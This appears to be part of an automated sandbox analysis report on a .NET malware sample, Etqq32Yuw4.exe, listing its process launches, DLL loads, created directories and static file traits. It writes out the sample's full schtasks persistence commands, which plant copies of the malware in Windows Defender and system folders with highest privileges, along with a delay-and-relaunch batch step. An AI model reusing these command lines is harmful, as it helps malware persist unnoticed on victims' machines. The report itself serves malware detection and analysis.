Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJEC" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "gmRWetzDcocJECg" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\CbsTemp\System.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Etqq32Yuw4" /sc ONLOGON /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Etqq32Yuw4E" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\Etqq32Yuw4.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe C:\Users\user\Desktop\Etqq32Yuw4.exe
Source: unknown	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe C:\Users\user\Desktop\Etqq32Yuw4.exe
Source: unknown	Process created: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
Source: unknown	Process created: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
Source: unknown	Process created: C:\Windows\CbsTemp\System.exe C:\Windows\CbsTemp\System.exe
Source: unknown	Process created: C:\Windows\CbsTemp\System.exe C:\Windows\CbsTemp\System.exe
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe "C:\Users\user\Desktop\Etqq32Yuw4.exe"
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe "C:\Users\user\Desktop\Etqq32Yuw4.exe"

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Section loaded: sspicli.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: mscoree.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: apphelp.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: version.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: uxtheme.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: windows.storage.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: wldp.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: profapi.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: cryptsp.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: rsaenh.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: cryptbase.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: sspicli.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: mscoree.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: version.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: uxtheme.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: windows.storage.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: wldp.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: profapi.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: cryptsp.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: rsaenh.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: cryptbase.dll
Source: C:\Windows\CbsTemp\System.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Directory created: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Directory created: C:\Program Files\Windows Defender\Platform\a4a755f39d8609	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Directory created: C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Directory created: C:\Program Files\Uninstall Information\a4a755f39d8609	Jump to behavior

Source: Etqq32Yuw4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Etqq32Yuw4.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Etqq32Yuw4.exe

Static file information: File size 1995264 > 1048576

Source: Etqq32Yuw4.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1e6a00

Source: Etqq32Yuw4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Etqq32Yuw4.exe, iFDD54ewNgBevy6tYHv.cs

